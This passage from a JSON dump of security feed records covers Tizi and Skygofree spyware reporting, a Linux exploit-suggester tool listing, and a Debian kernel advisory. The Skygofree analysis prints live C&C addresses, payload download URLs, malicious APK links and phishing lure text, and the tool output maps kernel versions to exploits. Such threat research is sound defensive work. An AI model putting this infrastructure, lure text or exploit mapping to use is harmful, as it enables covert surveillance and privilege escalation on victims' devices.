contacts its command-and-control servers by sending an SMS text message with the GPS coordinates of the infected device to a specific number. \n \n\n\n### Here's How Tizi Gains Root Access On Infected Devices\n\n \nFor gaining root access, the backdoor exploits previously disclosed vulnerabilities in older chipsets, devices, and Android versions, including CVE-2012-4220, CVE-2013-2596, CVE-2013-2597, CVE-2013-2595, CVE-2013-2094, CVE-2013-6282, CVE-2014-3153, CVE-2015-3636, and CVE-2015-1805. 
\n \nIf the backdoor unable to take root access on the infected device due to all the listed vulnerabilities being patched, \"_it will still attempt to perform some actions through the high level of permissions it asks the user to grant to it, mainly around reading and sending SMS messages and monitoring, redirecting, and preventing outgoing phone calls,_ \" Google said. \n \nTizi spyware also been designed to communicate with its command-and-control servers over regular HTTPS or using MQTT messaging protocol to receive commands from the attackers and uploading stolen data. \n \nThe Tizi backdoor contains various capabilities common to commercial spyware, such as \n \n\n\n * Stealing data from popular social media platforms including Facebook, Twitter, WhatsApp, Viber, Skype, LinkedIn, and Telegram.\n * Recording calls from WhatsApp, Viber, and Skype.\n * Sending and receiving SMS messages.\n * Accessing calendar events, call log, contacts, photos, and list of installed apps\n * Stealing Wi-Fi encryption keys.\n * Recording ambient audio and taking pictures without displaying the image on the device's screen.\n \nSo far Google has identified 1,300 Android devices infected by Tizi and removed it. \n \nMajority of which were located in African countries, specifically Kenya, Nigeria, and Tanzania. 
\n \n\n\n### \nHow to Protect your Android device from Hackers?\n\n \nSuch Android spyware can be used to target your devices as well, so you if own an Android device, you are strongly recommended to follow these simple steps in order to protect yourself: \n \n\n\n * Ensure that you have already opted for Google Play Protect.\n * Download and install apps only from the official Play Store, and always check permissions for each app.\n * Enable 'verify apps' feature from settings.\n * Protect your devices with pin or password lock so that nobody can gain unauthorized access to your device when remains unattended.\n * Keep \"unknown sources\" disabled while not using it.\n * Keep your device always up-to-date with the latest security patches.\n", "modified": "2017-11-28T10:50:18", "published": "2017-11-27T22:29:00", "id": "THN:C8A4219AFC2880AC311776A8C10BAE97", "href": "https://thehackernews.com/2017/11/android-spying-app.html", "type": "thn", "title": "Google Detects Android Spyware That Spies On WhatsApp, Skype Calls", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2018-01-17T15:58:19", "bulletinFamily": "blog", "cvelist": ["CVE-2013-2094", "CVE-2013-2595", "CVE-2013-6282", "CVE-2014-3153", "CVE-2015-3636"], "description": "\n\nAt the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago \u2013 at the end of 2014. 
Since then, the implant's functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to Wi-Fi networks controlled by cybercriminals.\n\nWe observed many web landing pages that mimic the sites of mobile operators and which are used to spread the Android implants. These domains have been registered by the attackers since 2015. According to our telemetry, that was the year the distribution campaign was at its most active. The activities continue: the most recently observed domain was registered on October 31, 2017. Based on our KSN statistics, there are several infected individuals, exclusively in Italy.\n\nMoreover, as we dived deeper into the investigation, we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine. The version we found was built at the beginning of 2017, and at the moment we are not sure whether this implant has been used in the wild.\n\nWe named the malware Skygofree, because we found the word in one of the domains*. \n\n## Malware Features\n\n### Android\n\nAccording to the observed samples and their signatures, early versions of this Android malware were developed by the end of 2014 and the campaign has remained active ever since.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-1.png>)\n\n_Signature of one of the earliest versions_\n\nThe code and functionality have changed numerous times; from simple unobfuscated malware at the beginning to sophisticated multi-stage spyware that gives attackers full remote control of the infected device. 
We have examined all the detected versions, including the latest one that is signed by a certificate valid from September 14, 2017.\n\nThe implant provides the ability to grab a lot of exfiltrated data, like call records, text messages, geolocation, surrounding audio, calendar events, and other memory information stored on the device.\n\nAfter manual launch, it shows a fake welcome notification to the user:\n\n_Dear Customer, we're updating your configuration and it will be ready as soon as possible._\n\nAt the same time, it hides an icon and starts background services to hide further actions from the user.\n\n**Service Name** | **Purpose** \n---|--- \nAndroidAlarmManager | Uploading last recorded .amr audio \nAndroidSystemService | Audio recording \nAndroidSystemQueues | Location tracking with movement detection \nClearSystems | GSM tracking (CID, LAC, PSC) \nClipService | Clipboard stealing \nAndroidFileManager | Uploading all exfiltrated data \nAndroidPush | XMPP \u0421&C protocol (url.plus:5223) \nRegistrationService | Registration on C&C via HTTP (url.plus/app/pro/) \n \nInterestingly, a self-protection feature was implemented in almost every service. Since in Android 8.0 (SDK API 26) the system is able to kill idle services, this code raises a fake update notification to prevent it:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-2.png>)\n\nCybercriminals have the ability to control the implant via HTTP, XMPP, binary SMS and [FirebaseCloudMessaging](<https://firebase.google.com/docs/cloud-messaging/>) (or GoogleCloudMessaging in older versions) protocols. Such a diversity of protocols gives the attackers more flexible control. In the latest implant versions there are 48 different commands. You can find a full list with short descriptions in the Appendix. 
Here are some of the most notable:\n\n * 'geofence' - this command adds a specified location to the implant's internal database and when it matches a device's current location the malware triggers and begins to record surrounding audio.\n * \"social\" \u2013 this command that starts the 'AndroidMDMSupport' service - this allows the files of any other installed application to be grabbed. The service name makes it clear that by applications the attackers mean MDM solutions that are business-specific tools. The operator can specify a path with the database of any targeted application and server-side PHP script name for uploading. \n\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-3.png>)\n\n_Several hardcoded applications targeted by the MDM-grabbing command_\n\n * 'wifi' \u2013 this command creates a new Wi-Fi connection with specified configurations from the command and enable Wi-Fi if it is disabled. So, when a device connects to the established network, this process will be in silent and automatic mode. This command is used to connect the victim to a Wi-Fi network controlled by the cybercriminals to perform traffic sniffing and man-in-the-middle (MitM) attacks. \n\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-4.png>)\n\n_addWifiConfig method code fragments_\n\n * 'camera' \u2013 this command records a video/capture a photo using the front-facing camera when someone next unlocks the device.\n\nSome versions of the Skygofree feature the self-protection ability exclusively for Huawei devices. There is a 'protected apps' list in this brand's smartphones, related to a battery-saving concept. Apps not selected as protected apps stop working once the screen is off and await re-activation, so the implant is able to determine that it is running on a Huawei device and add itself to this list. 
Due to this feature, it is clear that the developers paid special attention to the work of the implant on Huawei devices.\n\nAlso, we found a debug version of the implant (70a937b2504b3ad6c623581424c7e53d) that contains interesting constants, including the version of the spyware.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-5.png>)\n\n_Debug BuildConfig with the version_\n\nAfter a deep analysis of all discovered versions of Skygofree, we made an approximate timeline of the implant's evolution.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-6.png>)\n\n_Mobile implant evolution timeline_\n\nHowever, some facts indicate that the APK samples from stage two can also be used separately as the first step of the infection. Below is a list of the payloads used by the Skygofree implant in the second and third stages.\n\n#### Reverse shell payload\n\nThe reverse shell module is an external ELF file compiled by the attackers to run on Android. The choice of a particular payload is determined by the implant's version, and it can be downloaded from the command and control (C&C) server soon after the implant starts, or after a specific command. In the most recent case, the choice of the payload zip file depends on the device process architecture. 
For now, we observe only one payload version for the following ARM CPUs: arm64-v8a, armeabi, armeabi-v7a.\n\nNote that in almost all cases, this payload file, contained in zip archives, is named 'setting' or 'setting.o'.\n\nThe main purpose of this module is to provide reverse shell features on the device by connecting to the C&C server's socket.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-7.png>)\n\n_Reverse shell payload_\n\nThe payload is started by the main module with a specified host and port as a parameter, which is hardcoded to '54.67.109.199' and '30010' in some versions:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-8.png>)\n\nAlternatively, they could be hardcoded directly into the payload code:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-8-5.gif>)\n\nWe also observed variants that were equipped with similar reverse shell payloads directly in the main APK /lib/ path.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-9.png>)\n\n_Equipped reverse shell payload with specific string_\n\nAfter an in-depth look, we found that some versions of the reverse shell payload code share similarities with PRISM - a stealth reverse shell backdoor that is available on [Github](<https://github.com/andreafabrizi/prism/>).\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-10.png>)\n\n_Reverse shell payload from update_dev.zip_\n\n#### Exploit payload\n\nAt the same time, we found an important payload binary that is trying to exploit several known vulnerabilities and escalate privileges. According to several timestamps, this payload is used by implant versions created since 2016. It can also be downloaded by a specific command. 
The exploit payload contains the following file components:\n\n**Component name** | **Description** \n---|--- \nrun_root_shell/arrs_put_user.o/arrs_put_user/poc | Exploit ELF \ndb | Sqlite3 tool ELF \ndevice.db | Sqlite3 database with supported devices and their constants needed for privilege escalation \n \n'device.db' is a database used by the exploit. It contains two tables - 'supported_devices' and 'device_address'. The first table contains 205 devices with some Linux properties; the second contains the specific memory addresses associated with them that are needed for successful exploitation. You can find a full list of targeted models in the Appendix.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-11.png>)\n\n_Fragment of the database with targeted devices and specific memory addresses_\n\nIf the infected device is not listed in this database, the exploit tries to discover these addresses programmatically.\n\nAfter downloading and unpacking, the main module executes the exploit binary file. 
Once executed, the module attempts to get root privileges on the device by exploiting the following vulnerabilities:\n\nCVE-2013-2094 \nCVE-2013-2595 \nCVE-2013-6282 \nCVE-2014-3153 (futex aka [TowelRoot](<https://threatpost.com/android-root-access-vulnerability-affecting-most-devices/106683/>)) \nCVE-2015-3636\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-12.png>)\n\n_Exploitation process_\n\nAfter an in-depth look, we found that the exploit payload code shares several similarities with the public project [android-rooting-tools](<https://github.com/android-rooting-tools>).\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-13.png>)\n\n_Decompiled exploit function code fragment_\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-14.png>)\n\n_run_with_mmap function from the android-rooting-tools project_\n\nAs can be seen from the comparison, there are similar strings and also a unique comment in Italian, so it looks like the attackers created this exploit payload based on the android-rooting-tools project source code.\n\n#### Busybox payload\n\nBusybox is public software that provides several Linux tools in a single ELF file. In earlier versions, it operated with shell commands like this:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-15.png>)\n\n_Stealing WhatsApp encryption key with Busybox_\n\n#### Social payload\n\nActually, this is not a standalone payload file \u2013 in all the observed versions its code was compiled together with the exploit payload into one file ('poc_perm', 'arrs_put_user', 'arrs_put_user.o'). This is due to the fact that the implant needs to escalate privileges before performing social payload actions. This payload is also used by earlier versions of the implant. It has similar functionality to the 'AndroidMDMSupport' command from the current versions \u2013 stealing data belonging to other installed applications. The payload will execute shell code to steal data from various applications. 
The example below steals Facebook data:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-16.png>)\n\nAll the other hardcoded applications targeted by the payload:\n\n**Package name** | **Name** \n---|--- \njp.naver.line.android | LINE: Free Calls & Messages \ncom.facebook.orca | Facebook messenger \ncom.facebook.katana | Facebook \ncom.whatsapp | WhatsApp \ncom.viber.voip | Viber \n \n#### Parser payload\n\nUpon receiving a specific command, the implant can download a special payload to grab sensitive information from external applications. The case where we observed this involved WhatsApp.\n\nIn the examined version, it was downloaded from:\n\n_hxxp://url[.]plus/Updates/tt/parser.apk_\n\nThe payload can be a .dex or .apk file, which is a Java-compiled Android executable. After downloading, it will be loaded by the main module via the DexClassLoader API:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-17.png>)\n\nAs mentioned, we observed a payload that exclusively targets the WhatsApp messenger and it does so in an original way. 
The payload uses the Android Accessibility Service to get information directly from the displayed elements on the screen, so it waits for the targeted application to be launched and then parses all nodes to find text messages:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-18.png>)\n\nNote that the implant needs special permission to use the Accessibility Service API, but there is a command that performs a request with a phishing text displayed to the user to obtain such permission.\n\n### Windows\n\nWe have found multiple components that form an entire spyware system for the Windows platform.\n\n**Name** | **MD5** | **Purpose** \n---|---|--- \nmsconf.exe | 55fb01048b6287eadcbd9a0f86d21adf | Main module, reverse shell \nnetwork.exe | f673bb1d519138ced7659484c0b66c5b | Sending exfiltrated data \nsystem.exe | d3baa45ed342fbc5a56d974d36d5f73f | Surrounding sound recording by mic \nupdate.exe | 395f9f87df728134b5e3c1ca4d48e9fa | Keylogging \nwow.exe | 16311b16fd48c1c87c6476a455093e7a | Screenshot capturing \nskype_sync2.exe | 6bcc3559d7405f25ea403317353d905f | Skype call recording to MP3 \n \nAll modules, except skype_sync2.exe, are written in Python and packed into binary files with the Py2exe tool. This sort of conversion allows Python code to be run in a Windows environment without pre-installed Python binaries.\n\nmsconf.exe is the main module that provides control of the implant and the reverse shell feature. It opens a socket on the victim's machine and connects to a server-side component of the implant located at 54.67.109.199:6500. 
Before connecting with the socket, it creates a malware environment in 'APPDATA/myupd' and creates a sqlite3 database there \u2013 'myupd_tmp\\\\\\mng.db':\n\nCREATE TABLE MANAGE(ID INT PRIMARY KEY NOT NULL,Send INT NOT NULL, Keylogg INT NOT NULL,Screenshot INT NOT NULL,Audio INT NOT NULL); \nINSERT INTO MANAGE (ID,Send,Keylogg,Screenshot,Audio) VALUES (1, 1, 1, 1, 0 )\n\nFinally, the malware modifies the 'Software\\Microsoft\\Windows\\CurrentVersion\\Run' registry key to enable autostart of the main module.\n\nThe code contains multiple comments in Italian; here is the most noteworthy example:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-19.png>)\n\n_\"Receive commands from the remote server, here you can set the key commands to command the virus\"_\n\nHere are the available commands:\n\n**Name** | **Description** \n---|--- \ncd | Change current directory to the specified one \nquit | Close the socket \nnggexe | Execute received command via Python's subprocess.Popen() without returning output \nngguploads | Upload specified file to the specified URL \nnggdownloads | Download content from the specified URLs and save to specified file \nnggfilesystem | Dump file structure of the C: path, save it to a file in JSON format and zip it \nnggstart_screen \nnggstop_screen | Enable/disable screenshot module. When enabled, it makes a screenshot every 25 seconds \nnggstart_key \nnggstop_key | Enable/disable keylogging module \nnggstart_rec \nnggstop_rec | Enable/disable surrounding sound recording module \nngg_status | Send components status to the C&C socket \n*any other* | Execute received command via Python's subprocess.Popen(); the output is sent to the C&C socket. 
\n \nAll modules set hidden attributes on their files:\n\n**Module** | **Paths** | **Exfiltrated data format** \n---|---|--- \nmsconf.exe | %APPDATA%/myupd/gen/ | %Y%m%d-%H%M%S_filesystem.zip (file structure dump) \nsystem.exe | %APPDATA%/myupd/aud/ | %d%m%Y%H%M%S.wav (surrounding sounds) \nupdate.exe | %APPDATA%/myupd_tmp/txt/ \n%APPDATA%/myupd/txt/ | %Y%m%d-%H%M%S.txt (keylogging) \nwow.exe | %APPDATA%/myupd/scr/ | %Y%m%d-%H%M%S.jpg (screenshots) \nskype_sync2.exe | %APPDATA%/myupd_tmp/skype/ \n%APPDATA%/myupd/skype/ | yyyyMMddHHmmss_in.mp3 \nyyyyMMddHHmmss_out.mp3 \n(Skype call recordings) \n \nMoreover, we found one module written in .NET - skype_sync2.exe. The main purpose of this module is to exfiltrate Skype call recordings. Just like the previous modules, it contains multiple strings in Italian.\n\nAfter launch, it downloads a codec for MP3 encoding directly from the C&C server:\n\n_http://54.67.109.199/skype_resource/libmp3lame.dll_\n\nThe skype_sync2.exe module has a compilation timestamp of Feb 06 2017 and the following PDB string:\n\n_\\\\\\vmware-host\\Shared \nFolders\\dati\\Backup\\Projects\\REcodin_2\\REcodin_2\\obj\\x86\\Release\\REcodin_2.pdb_\n\nnetwork.exe is a module for submitting all exfiltrated data to the server. 
In the observed version of the implant it doesn't have an interface to work with the skype_sync2.exe module.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-20.png>)\n\n_network.exe submitting to the server code snippet_\n\n#### Code similarities\n\nWe found some code similarities between the implant for Windows and other publicly accessible projects.\n\n * https://github.com/El3ct71k/Keylogger/\n\nIt appears the developers have copied the functional part of the keylogger module from this project.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-21.png>)\n\n_update.exe module and Keylogger by 'El3ct71k' code comparison_\n\n * [Xenotix Python Keylogger](<https://github.com/ajinabraham/Xenotix-Python-Keylogger/>) including the specified mutex 'mutex_var_xboz'.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-22.png>)\n\n_update.exe module and Xenotix Python Keylogger code comparison_\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-23.png>)\n\n_'addStartup' method from msconf.exe module_\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-24.png>)\n\n_'addStartup' method from Xenotix Python Keylogger_\n\n## Distribution\n\nWe found several landing pages that spread the Android implants.\n\n**Malicious URL** | **Referrer** | **Dates** \n---|---|--- \nhttp://217.194.13.133/tre/internet/Configuratore_3.apk | http://217.194.13.133/tre/internet/ | 2015-02-04 to \npresent time \nhttp://217.194.13.133/appPro_AC.apk | - | 2015-07-01 \nhttp://217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE%20Configuratore%20v5_4_2.apk | http://217.194.13.133/190/configurazione/vodafone/smartphone/index.html | 2015-01-20 to \npresent time \nhttp://217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone%20Configuratore.apk | http://217.194.13.133/190/configurazione/vodafone/smartphone/index.html | currently active \nhttp://vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk | 
http://vodafoneinfinity.sytes.net/tim/internet/ | 2015-03-04 \nhttp://vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE%20Configuratore%20v5_4_2.apk | http://vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/ | 2015-01-14 \nhttp://windupdate.serveftp.com/wind/LTE/WIND%20Configuratore%20v5_4_2.apk | http://windupdate.serveftp.com/wind/LTE/ | 2015-03-31 \nhttp://119.network/lte/Internet-TIM-4G-LTE.apk | http://119.network/lte/download.html | 2015-02-04 \n2015-07-20 \nhttp://119.network/lte/Configuratore_TIM.apk | 2015-07-08 \n \nMany of these domains are outdated, but almost all (except one - appPro_AC.apk) samples located on the 217.194.13.133 server are still accessible. All the observed landing pages mimic the mobile operators' web pages through their domain name and web page content as well.\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-25.png>)\n\n_Landing web pages that mimic the Vodafone and Three mobile operator sites_\n\nNETWORK CONFIGURATION \n** AGG. 2.3.2015 *** \nDear Customer, in order to avoid malfunctions to your internet connection, we encourage you to upgrade your configuration. Download the update now and keep on navigating at maximum speed! \nDOWNLOAD NOW \nDo you doubt how to configure your smartphone? \nFollow the simple steps below and enter the Vodafone Fast Network. \nInstallation Guide \nDownload \nClick on the DOWNLOAD button you will find on this page and download the application on your smartphone. \nSet your Smartphone \nGo to Settings-> Security for your device and put a check mark on Unknown Sources (some models are called Sources Unknown). \nInstall \nGo to notifications on your device (or directly in the Downloads folder) and click Vodafone Configuration Update to install. \nTry high speed \nRestart your device and wait for confirmation sms. 
Your smartphone is now configured.\n\nFurther research of the attacker's infrastructure revealed more related mimicking domains.\n\nUnfortunately, for now we can't say in what environment these landing pages were used in the wild, but according to all the information at our disposal, we can assume that they are perfect for exploitation using malicious redirects or man-in-the-middle attacks. For example, this could be when the victim's device connects to a Wi-Fi access point that is infected or controlled by the attackers.\n\n## Artifacts\n\nDuring the research, we found plenty of traces of the developers and those maintaining the implant.\n\n * As already stated in the 'malware features' part, there are multiple giveaways in the code. Here are just some of them:\n**ngglobal - **_FirebaseCloudMessaging topic name_ \n--- \n**Issuer: CN = negg** - _from several certificates_ \n**negg.ddns[.]net, negg1.ddns[.]net, negg2.ddns[.]net - **_C&C servers_ \n**NG SuperShell - **_string from the reverse shell payload_ \n**ngg - **_prefix in command names of the implant for Windows_ \n \n[](<https://securelist.com/files/2018/01/180115-skygofree-26.png>)\n\n_Signature with specific issuer_\n\n * Whois records and IP relationships provide many interesting insights as well. There are a lot of other 'Negg' mentions in Whois records and references to it. For example:\n\n[](<https://securelist.com/files/2018/01/180115-skygofree-27.png>)\n\n## Conclusions\n\nThe Skygofree Android implant is one of the most powerful spyware tools that we have ever seen for this platform. 
As a result of the long-term development process, there are multiple exceptional capabilities: usage of multiple exploits for gaining root privileges, a complex payload structure, and never-before-seen surveillance features such as recording surrounding audio in specified locations.\n\nGiven the many artifacts we discovered in the malware code, as well as infrastructure analysis, we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions, just like HackingTeam.\n\n##### Notes\n\n*Skygofree has no connection to Sky, Sky Go or any other subsidiary of Sky, and does not affect the Sky Go service or app.\n\n[ **Skygofree Appendix \u2014 Indicators of Compromise (PDF)**](<https://securelist.com/files/2018/01/Skygofree_appendix_eng.pdf>)", "modified": "2018-01-16T10:00:58", "published": "2018-01-16T10:00:58", "href": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", "id": "SECURELIST:52B19EC96333D6EAA616F8D528A8E64A", "type": "securelist", "title": "Skygofree: Following in the footsteps of HackingTeam", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2019-06-26T15:22:17", "bulletinFamily": "tools", "cvelist": ["CVE-2012-0056", "CVE-2010-4073", "CVE-2009-2692", "CVE-2009-1185", "CVE-2010-3437", "CVE-2010-2959", "CVE-2010-1146", "CVE-2010-0415", "CVE-2010-3850", "CVE-2009-3547", "CVE-2010-3848", "CVE-2010-3081", "CVE-2010-4347", "CVE-2013-2094", "CVE-2010-3301"], "description": "Linux Exploit Suggester; based on operating system release number. \n\n \n\n\nThis program, run without arguments, performs a 'uname -r' to grab the Linux operating system's release version and returns a suggestive list of possible exploits. Nothing fancy, so a patched/back-ported patch may fool this script. 
\n\n \n\n\nIt is also possible to provide the '-k' flag to manually enter the Kernel Version/Operating System Release Version. \n\n \n\n\nThis script has been extremely useful on site and in exams. Now Open-sourced under GPLv2. \n\n \nSample Output \n\n \n \n $ perl ./Linux_Exploit_Suggester.pl -k 3.0.0\n \n Kernel local: 3.0.0\n \n Possible Exploits:\n [+] semtex\n CVE-2013-2094\n Source: www.exploit-db.com/download/25444/\n [+] memodipper\n CVE-2012-0056\n Source: http://www.exploit-db.com/exploits/18411/\n [+] perf_swevent\n CVE-2013-2094\n Source: http://www.exploit-db.com/download/26131\n \n \n \n $ perl ./Linux_Exploit_Suggester.pl -k 2.6.28\n \n Kernel local: 2.6.28\n \n Possible Exploits:\n [+] sock_sendpage2\n Alt: proto_ops CVE-2009-2692\n Source: http://www.exploit-db.com/exploits/9436\n [+] half_nelson3\n Alt: econet CVE-2010-4073\n Source: http://www.exploit-db.com/exploits/17787/\n [+] reiserfs\n CVE-2010-1146\n Source: http://www.exploit-db.com/exploits/12130/\n [+] pktcdvd\n CVE-2010-3437\n Source: http://www.exploit-db.com/exploits/15150/\n [+] american-sign-language\n CVE-2010-4347\n Source: http://www.securityfocus.com/bid/45408/\n [+] half_nelson\n Alt: econet CVE-2010-3848\n Source: http://www.exploit-db.com/exploits/6851\n [+] udev\n Alt: udev <1.4.1 CVE-2009-1185\n Source: http://www.exploit-db.com/exploits/8478\n [+] do_pages_move\n Alt: sieve CVE-2010-0415\n Source: Spenders Enlightenment\n [+] pipe.c_32bit\n CVE-2009-3547\n Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c\n [+] exit_notify\n Source: http://www.exploit-db.com/exploits/8369\n [+] can_bcm\n CVE-2010-2959\n Source: http://www.exploit-db.com/exploits/14814/\n [+] ptrace_kmod2\n Alt: ia32syscall,robert_you_suck CVE-2010-3301\n Source: http://www.exploit-db.com/exploits/15023/\n [+] half_nelson1\n Alt: econet CVE-2010-3848\n Source: http://www.exploit-db.com/exploits/17787/\n [+] half_nelson2\n Alt: econet CVE-2010-3850\n Source: 
http://www.exploit-db.com/exploits/17787/\n [+] sock_sendpage\n Alt: wunderbar_emporium CVE-2009-2692\n Source: http://www.exploit-db.com/exploits/9435\n [+] video4linux\n CVE-2010-3081\n Source: http://www.exploit-db.com/exploits/15024/\n \n\n \n\n\n[ ** Download Linux Exploit Suggester ** ](<https://github.com/PenturaLabs/Linux_Exploit_Suggester>)\n", "edition": 14, "modified": "2013-08-29T00:48:05", "published": "2013-08-29T00:48:05", "id": "KITPLOIT:5310354020898253604", "href": "http://www.kitploit.com/2013/08/linux-exploit-suggester-grab-linux.html", "title": "[Linux Exploit Suggester] Grab the Linux Operating Systems release version, and return a suggestive list of possible exploits", "type": "kitploit", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-08-12T01:00:43", "bulletinFamily": "unix", "cvelist": ["CVE-2013-3228", "CVE-2013-0160", "CVE-2013-3231", "CVE-2013-3229", "CVE-2013-3224", "CVE-2013-3301", "CVE-2013-3234", "CVE-2013-3227", "CVE-2013-2015", "CVE-2013-1929", "CVE-2013-3225", "CVE-2013-1979", "CVE-2013-3222", "CVE-2013-3076", "CVE-2013-2094", "CVE-2013-1796", "CVE-2013-3235", "CVE-2013-3223"], "description": "- ----------------------------------------------------------------------\nDebian Security Advisory DSA-2669-1 security@debian.org\nhttp://www.debian.org/security/ Dann Frazier\nMay 15, 2013 http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage : linux\nVulnerability : privilege escalation/denial of service/information leak\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2013-0160 CVE-2013-1796 CVE-2013-1929 CVE-2013-1979\n CVE-2013-2015 CVE-2013-2094 CVE-2013-3076 CVE-2013-3222\n CVE-2013-3223 CVE-2013-3224 CVE-2013-3225 CVE-2013-3227\n CVE-2013-3228 CVE-2013-3229 CVE-2013-3231 CVE-2013-3234\n CVE-2013-3235 CVE-2013-3301\n\nSeveral vulnerabilities have been discovered in the Linux kernel that may lead\nto a denial of 
service, information leak or privilege escalation. The Common\nVulnerabilities and Exposures project identifies the following problems:\n\nCVE-2013-0160\n\n vladz reported a timing leak with the /dev/ptmx character device. A local\n user could use this to determine sensitive information such as password\n length.\n\nCVE-2013-1796\n\n Andrew Honig of Google reported an issue in the KVM subsystem. A user in\n a guest operating system could corrupt kernel memory, resulting in a\n denial of service.\n\nCVE-2013-1929\n\n Oded Horovitz and Brad Spengler reported an issue in the device driver for\n Broadcom Tigon3 based gigabit Ethernet. Users with the ability to attach\n untrusted devices can create an overflow condition, resulting in a denial\n of service or elevated privileges.\n\nCVE-2013-1979\n\n Andy Lutomirski reported an issue in the socket level control message\n processing subsystem. Local users may be able to gain elevated privileges.\n\nCVE-2013-2015\n\n Theodore Ts'o provided a fix for an issue in the ext4 filesystem. Local\n users with the ability to mount a specially crafted filesystem can cause\n a denial of service (infinite loop).\n\nCVE-2013-2094\n\n Tommie Rantala discovered an issue in the perf subsystem. An out-of-bounds\n access vulnerability allows local users to gain elevated privileges.\n\nCVE-2013-3076\n\n Mathias Krauss discovered an issue in the userspace interface for hash\n algorithms. Local users can gain access to sensitive kernel memory.\n \nCVE-2013-3222\n\n Mathias Krauss discovered an issue in the Asynchronous Transfer Mode (ATM)\n protocol support. Local users can gain access to sensitive kernel memory.\n\nCVE-2013-3223\n\n Mathias Krauss discovered an issue in the Amateur Radio AX.25 protocol\n support. Local users can gain access to sensitive kernel memory.\n\nCVE-2013-3224\n\n Mathias Krauss discovered an issue in the Bluetooth subsystem. 
Local users\n can gain access to sensitive kernel memory.\n\nCVE-2013-3225\n\n Mathias Krauss discovered an issue in the Bluetooth RFCOMM protocol\n support. Local users can gain access to sensitive kernel memory.\n \nCVE-2013-3227\n\n Mathias Krauss discovered an issue in the Communication CPU to Application\n CPU Interface (CAIF). Local users can gain access to sensitive kernel\n memory.\n\nCVE-2013-3228\n\n Mathias Krauss discovered an issue in the IrDA (infrared) subsystem\n support. Local users can gain access to sensitive kernel memory.\n\nCVE-2013-3229\n\n Mathias Krauss discovered an issue in the IUCV support on s390 systems.\n Local users can gain access to sensitive kernel memory.\n\nCVE-2013-3231\n\n Mathias Krauss discovered an issue in the ANSI/IEEE 802.2 LLC type 2\n protocol support. Local users can gain access to sensitive kernel memory.\n\nCVE-2013-3234\n\n Mathias Krauss discovered an issue in the Amateur Radio X.25 PLP (Rose)\n protocol support. Local users can gain access to sensitive kernel memory.\n\nCVE-2013-3235\n\n Mathias Krauss discovered an issue in the Transparent Inter Process\n Communication (TIPC) protocol support. Local users can gain access to\n sensitive kernel memory.\n\nCVE-2013-3301\n\n Namhyung Kim reported an issue in the tracing subsystem. A privileged\n local user could cause a denial of service (system crash). This\n vulnerability is not applicable to Debian systems by default.\n\nFor the stable distribution (wheezy), this problem has been fixed in version\n3.2.41-2+deb7u1.\n\nNote: Updates are currently available for the amd64, i386, ia64, s390, s390x\nand sparc architectures. 
Updates for the remaining architectures will be\nreleased as they become available.\n\nThe following matrix lists additional source packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\n Debian 7.0 (wheezy)\n user-mode-linux 3.2-2um-1+deb7u1\n\nWe recommend that you upgrade your linux and user-mode-linux packages.\n\nNote: Debian carefully tracks all known security issues across every\nlinux kernel package in all releases under active security support.\nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, updates for lower priority issues will normally not\nbe released for all kernels at the same time. Rather, they will be\nreleased in a staggered or "leap-frog" fashion.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2013-05-16T02:56:25", "published": "2013-05-16T02:56:25", "id": "DEBIAN:DSA-2669-1:6658C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00077.html", "title": "[SECURITY] [DSA 2669-1] linux security update", "type": "debian", "cvss": 